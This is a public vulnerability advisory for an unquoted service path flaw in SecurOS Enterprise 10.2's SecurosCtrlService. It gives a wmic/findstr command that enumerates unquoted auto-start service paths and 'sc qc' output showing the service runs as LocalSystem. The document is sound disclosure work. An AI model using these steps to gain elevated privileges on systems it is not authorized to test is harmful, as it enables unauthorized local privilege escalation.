Intelligent Security System SecurOS Enterprise 10.2 Unquoted Service Path

Intelligent Security System SecurOS Enterprise version 10.2 suffers from a SecurosCtrlService unquoted service path vulnerability.


MD5 | d9081058c662d2b3c1302de345d620bd

# Exploit Title: Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path
# Discovery Date: 2019-10-28
# Exploit Author: Alberto Vargas
# Vendor Homepage: https://www.issivs.com/product-detail/secure-os-enterprise/
# Software Link: https://www.issivs.com/schedule-a-free-demo/(trial version for unlicensed users)
# Version: 10.2 R1
# Tested on: Windows 10 Pro x64 Esp

# Version: 10.0.18362

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# networked digital video and audio recording, video image pattern processing and digital data transmission.
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# Summary: ISS’ global standard for video management, access control and video analytics, SecurOS™ Enterprise is perfectly suited for
# managing large and demanding installations. The Enterprise framework can manage and monitor an unlimited number of cameras and devices, apply
# intelligent video analytics, and act as an integration platform for a variety of 3rd party systems. Built to handle enterprise level deployments,
# SecurOS Enterprise, comes with built-in Native Failure functionality, Microsoft Active Directory / LDAP integration, and has an extensive set
# of Cybersecurity features making it one of the most reliable and secure video management platforms in the market today. SecurOS Enterprise
# supports all the features of the other 3 editions.

# Description: The application suffers from an unquoted search path issue impacting the service 'SecurosCtrlService'. This could potentially allow an
# authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require
# the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could
# potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
# of the application.

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

SecurOS Control ServiceSecurosCtrlServiceC:\Program Files (x86)\ISS\SecurOS\securos_svc.exeAuto

# Service info:

C:\Users\user>sc qc SecurosCtrlService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SecurosCtrlService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : SecurOS Control Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem

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